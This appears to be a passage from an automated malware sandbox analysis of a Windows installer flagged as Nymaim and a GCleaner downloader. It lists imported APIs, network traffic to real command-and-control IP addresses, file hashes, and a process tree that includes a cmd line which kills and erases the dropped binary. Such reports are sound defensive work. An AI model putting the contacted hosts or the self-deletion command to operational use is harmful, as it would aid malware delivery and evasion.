              user32.dllTranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
              comctl32.dllInitCommonControls
              advapi32.dllAdjustTokenPrivileges
              Language of compilation systemCountry where language is spokenMap
              DutchNetherlands
              EnglishUnited States
              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
              45.12.253.72192.168.2.380497082852925 01/25/23-10:02:04.044834TCP2852925ETPRO TROJAN GCleaner Downloader - Payload Response804970845.12.253.72192.168.2.3
              TimestampSource PortDest PortSource IPDest IP
              Jan 25, 2023 10:02:03.838169098 CET4970780192.168.2.345.12.253.56
              Jan 25, 2023 10:02:03.864574909 CET804970745.12.253.56192.168.2.3
              Jan 25, 2023 10:02:03.864726067 CET4970780192.168.2.345.12.253.56
              Jan 25, 2023 10:02:03.866645098 CET4970780192.168.2.345.12.253.56
              Jan 25, 2023 10:02:03.894937992 CET804970745.12.253.56192.168.2.3
              Jan 25, 2023 10:02:03.906924009 CET804970745.12.253.56192.168.2.3
              Jan 25, 2023 10:02:03.907047033 CET4970780192.168.2.345.12.253.56
              Jan 25, 2023 10:02:03.933878899 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:03.962369919 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:03.962474108 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:03.965511084 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:03.992350101 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:03.992405891 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:03.992479086 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:04.017834902 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:04.044780970 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:04.044833899 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:04.044881105 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:04.044903040 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:04.044934034 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:04.044971943 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:04.045028925 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:04.045042992 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:04.045097113 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:04.045144081 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:04.045197964 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:04.045212984 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:04.045248032 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:04.045277119 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:04.045326948 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:04.045353889 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:04.045403004 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:04.045423031 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:04.045476913 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:04.045490980 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:04.045531988 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:04.072855949 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:04.072938919 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:04.072961092 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:04.072999001 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:04.073029995 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:04.073085070 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:04.073100090 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:04.073138952 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:04.073163986 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:04.073218107 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:04.073234081 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:04.073268890 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:04.073296070 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:04.073349953 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:04.073364019 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:04.073405027 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:04.073425055 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:04.073472023 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:04.073508024 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:04.073524952 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:04.073553085 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:04.073600054 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:04.073626041 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:04.073656082 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:04.073683023 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:04.073729992 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:04.073750019 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:04.073785067 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:04.073812962 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:04.073865891 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:04.073879957 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:04.073920012 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:04.073941946 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:04.073987961 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:04.074008942 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:04.074048042 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:04.074069977 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:04.074122906 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:04.074136019 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:04.074170113 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:04.100656986 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:04.100718021 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:04.100743055 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:04.100780964 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:04.100815058 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:04.100871086 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:04.100887060 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:04.100938082 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:04.100951910 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:04.100985050 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:04.101016998 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:04.101146936 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:04.101169109 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:04.101198912 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:04.101242065 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:04.101289034 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:04.101310968 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:04.101342916 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:04.101373911 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:04.101442099 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:04.101459026 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:04.101506948 CET804970845.12.253.72192.168.2.3
              Jan 25, 2023 10:02:04.101553917 CET4970880192.168.2.345.12.253.72
              Jan 25, 2023 10:02:04.101569891 CET4970880192.168.2.345.12.253.72
              • 45.12.253.56
              • 45.12.253.72
              • 45.12.253.75

              Click to jump to process

              Target ID:0
              Start time:10:01:58
              Start date:25/01/2023
              Path:C:\Users\user\Desktop\file.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\file.exe
              Imagebase:0x400000
              File size:1782938 bytes
              MD5 hash:14E09C7A5842688842F6C0BF61C17135
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low

              Target ID:1
              Start time:10:01:58
              Start date:25/01/2023
              Path:C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp" /SL5="$4023C,1536639,54272,C:\Users\user\Desktop\file.exe"
              Imagebase:0x400000
              File size:712704 bytes
              MD5 hash:D76329B30DB65F61D55B20F36B56DA26
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Antivirus matches:
              • Detection: 2%, ReversingLabs
              Reputation:moderate

              Target ID:2
              Start time:10:01:59
              Start date:25/01/2023
              Path:C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe
              Wow64 process (32bit):true
              Commandline:"C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe"
              Imagebase:0x400000
              File size:1327103 bytes
              MD5 hash:88A9155EB9D85157634ED38D128C877B
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000002.00000002.323772698.0000000003250000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
              Antivirus matches:
              • Detection: 100%, Joe Sandbox ML
              Reputation:low

              Target ID:3
              Start time:10:02:03
              Start date:25/01/2023
              Path:C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\6tohc1clzbcir.exe
              Wow64 process (32bit):true
              Commandline:
              Imagebase:0x170000
              File size:73728 bytes
              MD5 hash:3FB36CB0B7172E5298D2992D42984D06
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Antivirus matches:
              • Detection: 60%, ReversingLabs
              Reputation:high

              Target ID:15
              Start time:10:02:35
              Start date:25/01/2023
              Path:C:\Windows\SysWOW64\cmd.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\System32\cmd.exe" /c taskkill /im "finalrecovery.exe" /f & erase "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe" & exit
              Imagebase:0xb0000
              File size:232960 bytes
              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:16
              Start time:10:02:35
              Start date:25/01/2023
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff745070000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:17
              Start time:10:02:35
              Start date:25/01/2023
              Path:C:\Windows\SysWOW64\taskkill.exe
              Wow64 process (32bit):true
              Commandline:taskkill /im "finalrecovery.exe" /f
              Imagebase:0x850000
              File size:74752 bytes
              MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              No disassembly